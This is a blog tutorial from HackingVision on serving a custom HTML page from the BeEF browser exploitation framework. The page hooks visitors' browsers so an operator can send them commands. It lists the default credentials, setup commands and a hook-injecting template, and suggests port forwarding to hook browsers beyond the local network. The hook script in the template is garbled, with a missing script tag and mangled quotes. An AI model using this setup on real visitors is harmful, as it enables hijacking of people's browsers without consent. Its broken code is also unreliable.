Beef framework adding custom pages – HackingVision

Beef framework adding custom pages

Welcome to HackingVision, Today we will learn how to add custom pages to Beef framework. We assume you already know the basics of HTML programming.

Step 1: Start Beef-XSS Framework

Let us start by opening Beef-XSS framework, Open a new command terminal enter command Beef-XSS.

 

beef-xss

 

 

Step 2: Logging into Beef-XSS Framework

Launch a web browser and enter your local IP address into the search bar. See the screenshot above change 127.0.0.1 to your local IP Address.

 

You can find your local IP by using ifconfig command.

ifconfig

 

Default Credentials for Beef-XSS Framework

Username: beef

Password: beef

After you have logged into Beef-XSS you will be brought to this page.

 

thedash

Step 3: Creating HTML template

Open a new terminal and enter the command below. (This command will create a directory to host our templates from)

mkdir /usr/share/beef-xss/extensions/demos/html/websites

 

 

Open a text editor ill be using gedit, copy and paste basic HTML script below to a new text file. Once you have modified HTML template below save file and name file index.html

 

Save file to /usr/share/beef-xss/extensions/demos/html/websites

 

/usr/share/beef-xss/extensions/demos/html/websites

<! DOCTYPE html >

<html>

<head>

<title> what ever u want </title>

 

var commandModuleStr = ‘” type=”text/javascript”>’ ;

document.write(commandModuleStr ) ;

 

</head>

<body>

<h1> WHAT EVER YOU WANT </h1>

<p> anything u want </p>

</body>

</html>

 

Step 4: Restarting Beef framework

Let us restart beef framework we can do this by opening a command terminal and using the following command.

service beef-xss  restart
restart

 

In a web browser open up beef framework login.

 

Replace 192.168.1.121 with your local IP.

 

192.168.1.121:3000/ui/panel

 

To check if our hook works, open a new tab in your browser and go to the following URL replace 192.168.X.X with your local IP address.

 

http://192.168.X.X:3000/demos/websites/index.html

 

If the target browser has been successfully hooked it will pop up under online browsers in Beef framework.

Now we can make commands on the target browser as long as the target stays on the hooked URL. but we can also open a new tab to stay connected if u want to hooked browsers outside your local network look into port forwarding.

Hope you enjoyed this tutorial.

Cloning websites to use with Beef-XSS – HackingVision